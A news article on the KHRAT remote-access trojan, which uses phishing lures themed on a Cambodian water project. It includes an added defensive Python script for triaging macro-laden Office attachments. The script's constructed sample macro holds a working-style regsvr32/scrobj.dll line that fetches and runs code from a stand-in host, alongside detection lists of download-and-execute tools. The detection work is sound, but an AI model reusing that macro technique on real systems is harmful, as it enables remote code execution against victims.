Cambodia under cyberattack, political background suspected
Cambodia’s private and public computer networks are being targeted by malware tailored to the country and delivered through spam and phishing emails, according to US-based cyber security firm Palo Alto Networks.
The malware, dubbed KHRAT (Khmer Remote Access Trojan), lures victims with emails disguised as official communications. It was first noticed in late June but has since gained new capabilities and delivery methods, security researchers at Palo Alto Networks said. The trojan’s aim is to gain a foothold on a victim’s computer and spy on it through keylogging, screenshots and remote shell access.
“KHRAT is a trojan that registers victims using their infected machine’s username, system language and local IP address,” the cyber security firm wrote in a blog.
“It uses updated spear phishing techniques and themes, multiple techniques to download and execute additional payloads using built-in Windows applications, expanded infrastructure mimicking the name of the well-known cloud-based file hosting service Dropbox and compromised Cambodian government servers,” it added.
In the latest version, the attacks are carried out through fraudulent emails carrying infected attachments that refer to the Mekong Integrated Water Resources Management Project (MIWRMP), a $15 million initiative funded by the World Bank that is currently being rolled out to improve water and fisheries management in northeastern Cambodia.
Computer users should be extra vigilant when they receive an email with an attached Word document named “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June 26-30, 2017(update).doc” that purports to relate to the water resources project.
When users open the Word file, the document claims that the computer’s version of Microsoft Word must be updated before the content can be displayed, and walks them through a few clicks that enable Word’s macros. The macro then downloads malicious code from a server in Russia, which executes the trojan and drops additional components that modify the Windows registry.
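The infection chain described above (a macro-capable .doc attachment, a lure to enable macros, then a download-and-execute step that leans on built-in Windows binaries) is the kind of thing a mail gateway or SOC can triage mechanically. The following is an added example written for this page; it is not Palo Alto Networks’ code, not KHRAT analysis tooling, and makes no claim about the real sample’s macro contents. It checks an attachment for the OLE2 signature and the storage names Word uses for a VBA project, scans decompressed macro source for auto-run and fetch/execute tokens, and applies a process-tree rule for an Office host spawning a script or LOLBin child. The sample document bytes, macro text and process paths are constructed stand-ins; the token lists and scoring thresholds are heuristics chosen here, not anything from the original report.

```python
"""Heuristic triage for macro-laden Office lures (added example, not the
original report's code). Sample inputs below are constructed, not real KHRAT."""
import re
from typing import Dict, List, Optional

# OLE2 compound-file signature: legacy .doc files start with these eight bytes.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Storage/stream names Word uses for a VBA project. OLE2 directory entry names
# are stored as UTF-16LE, so we search for that encoding.
VBA_STORAGE_MARKERS = tuple(
    name.encode("utf-16-le") for name in ("Macros", "VBA", "_VBA_PROJECT", "ThisDocument")
)

# Auto-run entry points plus fetch-and-execute primitives a macro downloader
# typically uses, including built-in Windows binaries (heuristic list).
SUSPICIOUS_MACRO_TOKENS = (
    "AutoOpen", "Document_Open", "AutoExec", "Auto_Open",
    "WScript.Shell", "Shell", "CreateObject",
    "URLDownloadToFile", "XMLHTTP", "ADODB.Stream",
    "powershell", "mshta", "regsvr32", "rundll32", "certutil", "bitsadmin",
    "RegWrite", "CurrentVersion\\Run",
)

# Office hosts that should not normally spawn script/LOLBin children.
OFFICE_HOSTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
LOLBIN_CHILDREN = ("powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                   "certutil.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe", "cmd.exe")


def is_ole2(data: bytes) -> bool:
    return data.startswith(OLE2_MAGIC)


def has_vba_storage(data: bytes) -> bool:
    """True if an OLE2 file carries the storages Word uses for a VBA project."""
    return is_ole2(data) and any(marker in data for marker in VBA_STORAGE_MARKERS)


def suspicious_tokens(macro_source: str) -> List[str]:
    """Case-insensitive scan of decompressed VBA source. Module streams are
    MS-OVBA compressed on disk, so pass decompressed text (e.g. olevba output),
    not the raw file bytes."""
    return [tok for tok in SUSPICIOUS_MACRO_TOKENS
            if re.search(re.escape(tok), macro_source, re.IGNORECASE)]


def triage_attachment(filename: str, data: bytes, macro_source: Optional[str] = None) -> Dict:
    """Score a mail attachment against the lure pattern: macro-capable type,
    double extension, embedded VBA project, suspicious macro tokens."""
    reasons = []
    lower = filename.lower()
    if lower.endswith((".doc", ".dot", ".docm", ".xls", ".xlsm")):
        reasons.append("macro-capable Office attachment")
    if re.search(r"\.(pdf|txt|jpg|png)\.(doc|docm|xls|xlsm)$", lower):
        reasons.append("double extension")
    if has_vba_storage(data):
        reasons.append("embedded VBA project")
    tokens = suspicious_tokens(macro_source) if macro_source else []
    if tokens:
        reasons.append("macro tokens: " + ", ".join(tokens))
    score = len(reasons) + (2 if tokens else 0)  # tokens weigh extra
    verdict = "block" if score >= 3 else "review" if score >= 1 else "allow"
    return {"filename": filename, "score": score, "verdict": verdict, "reasons": reasons}


def flag_office_child(parent_image: str, child_image: str) -> bool:
    """Process-tree rule: an Office host spawning a script/LOLBin child."""
    parent = parent_image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    child = child_image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return parent in OFFICE_HOSTS and child in LOLBIN_CHILDREN


# Constructed stand-ins: an OLE2 header, padding, then the UTF-16LE directory
# names a macro-bearing .doc would carry. Not a real document.
SAMPLE_DOC = OLE2_MAGIC + b"\x00" * 504 + "Macros".encode("utf-16-le") + "VBA".encode("utf-16-le")
# Constructed macro illustrating the auto-run + LOLBin download pattern.
SAMPLE_MACRO = """Sub AutoOpen()
    Dim url As String
    url = "http://update-server.invalid/word_update.sct"
    CreateObject("WScript.Shell").Run "regsvr32 /s /n /u /i:" & url & " scrobj.dll", 0
End Sub
"""
SAMPLE_LURE_NAME = ("Mission Announcement Letter for MIWRMP phase 3 implementation "
                    "support mission, June 26-30, 2017(update).doc")

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_LURE_NAME, SAMPLE_DOC, SAMPLE_MACRO))
    print(flag_office_child(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                            r"C:\Windows\System32\regsvr32.exe"))
```

The static checks are deliberately cheap and will produce false positives on legitimate macro documents; they are a triage filter for what gets pulled into sandboxing, not a verdict. The process-tree rule is the more robust of the two for this lure, since the download-and-execute step has to go through a child process whatever the macro text looks like.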
The fact that the malware was also hosted on compromised Cambodian government servers, together with the political nature of the spear phishing emails, suggests the attacks may be aimed at spying on political rivals or disrupting political activity, Palo Alto Networks noted.